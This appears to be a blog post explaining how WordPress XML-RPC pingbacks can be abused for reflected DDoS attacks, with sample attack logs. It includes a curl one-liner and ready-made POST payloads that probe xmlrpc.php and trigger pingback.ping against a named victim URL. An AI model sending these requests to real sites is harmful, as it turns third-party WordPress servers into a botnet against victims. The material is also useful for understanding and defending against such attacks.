i XML-RPC DDOS – All things in moderation

XML-RPC DDOS

In computing, a denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.(wikipedia)

XML_RPC_DDOS1

DOS Attack

The attacker will use his computer and directly send a series of packets to a victim’s machine. Typical SYN-flood and UDP and DNS amplification attacks.

Unlike DOS attack. DDOS attacks as attackers take advantage of the other machines are considered Zombie computers to attack the victim machine. This will cause the direction of attack serious consequences than the DOS attack and the attacker appearances will also be more difficult.

XML_RPC_DDOS2

DDOS Attack

What is XML-RPC?
It’s a spec and a set of implementations that allow software running on disparate operating systems, running in different environments to make procedure calls over the Internet.

It’s remote procedure calling using HTTP as the transport and XML as the encoding. XML-RPC is designed to be as simple as possible, while allowing complex data structures to be transmitted, processed and returned.

XML RPC features will allow the call remote using HTTP. They are also used to create trackbacks and pingbacks, allowing you to link your website to other interesting sites.

We can understand the simple process of attacking as follows:
Attacker will simultaneously send requests to the zombies with the directive website that “you need are located in the victim”. (Mechanism pingbacks).
Upon receipt of such request zombie websites will simultaneously break into victim to grab resources. With a large enough will cause the victim down.

XML_RPC_DDOS4

XML_RPC_DDOS3

By using the function of this seemingly harmless attacker can abuse websites, sending thousands of requests to the victim has to be down.

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.xxxcloud.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2;http://www.zycfly.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.ysbitan.com" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.ddwz8.net" 
..

All queries are random values to bypasse threads through cache and force it to reload one full page for each query. It makes the victim down faster. It is interesting that all requests are sent from valid sites.
Work to enable this feature of wordpress unwittingly making it the giant botnet.
The implementation is quite easy attack on the linux command:

$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d 'pingback.pinghttp://victim.comwww.anywordpresssite.com/postchosen'

In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp proxy, send the request below:

POST /xmlrpc.php HTTP/1.1 
Host: veris.in 
Connection: keep-alive 
Content-Length: 175

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>demo.sayHello</methodName> 
<params> 
<param>
<value>admin</value>
</param> 
</params> 
</methodCall>

Notice that a successful response is received showing that the xmlrpc.php file is enabled.
The xmlrpc.php file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below:

POST /xmlrpc.php HTTP/1.1 
Host: veris.in
Connection: keep-alive 
Content-Length: 293

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://victim.com</string></value>
</param>
<param>
<value><string>https://veris.in/anypost</string></value>
</param>
</params>
</methodCall>

Leave a Reply